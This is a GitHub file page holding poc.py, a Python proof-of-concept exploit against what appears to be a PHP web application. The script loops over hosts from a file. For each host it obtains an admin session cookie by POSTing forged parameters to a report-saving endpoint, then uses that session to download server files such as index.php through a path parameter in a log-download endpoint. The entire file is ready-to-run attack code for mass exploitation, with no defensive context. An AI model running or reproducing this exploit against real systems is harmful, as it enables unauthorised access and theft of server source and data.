-
Notifications
You must be signed in to change notification settings - Fork 0
/
poc.py
90 lines (79 loc) · 3.7 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import requests
import time
def get_hosts_from_file(file_path):
with open(file_path, 'r') as file:
return [line.strip() for line in file.readlines()]
def send_post_request(url, data, headers):
try:
response = requests.post(url, data=data, headers=headers)
phpsessid = None
if 'Set-Cookie' in response.headers:
cookies = response.headers['Set-Cookie']
if 'PHPSESSID' in cookies:
start = cookies.find('PHPSESSID=')
end = cookies.find(';', start)
phpsessid = cookies[start:end]
print(phpsessid)
else:
print("PHPSESSID not found in Set-Cookie")
else:
print("Set-Cookie header not found in the response")
return phpsessid
except requests.ConnectionError as e:
print(f"Connection error occurred: {e}")
except requests.Timeout as e:
print(f"Timeout error occurred: {e}")
except requests.RequestException as e:
print(f"An error occurred: {e}")
def send_get_request_with_cookie(url, headers, cookie_value):
headers['Cookie'] = cookie_value
try:
response = requests.get(url, headers=headers)
print("当前HOST================================="+host)
print(response.text) # Print the response text to see the result
return response
except requests.ConnectionError as e:
print(f"Connection error occurred: {e}")
except requests.Timeout as e:
print(f"Timeout error occurred: {e}")
except requests.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
hosts = get_hosts_from_file('url.txt')
data = {
'aa': 'xx',
'userID': 'admin',
'fondsid': '1',
'comid': '1'
}
for host in hosts:
post_url = f"http://{host}/Setting/Report/DesignReportSave.html?report=&token=java"
post_headers = {
'Host': host,
'Accept-Encoding': 'gzip, deflate',
'Origin': 'http://49.4.48.132',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
'Cookie': 'winWidth=1920; winHeight=455',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'Content-Length': '66'
}
phpsessid = send_post_request(post_url, data, post_headers)
if phpsessid:
get_url = f"http://{host}/Logs/Annals/downLoad.html?path=/index.php"
get_headers = {
'Host': host,
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Connection': 'close'
}
send_get_request_with_cookie(get_url, get_headers, phpsessid)
time.sleep(1) # Pause between requests to avoid overwhelming the server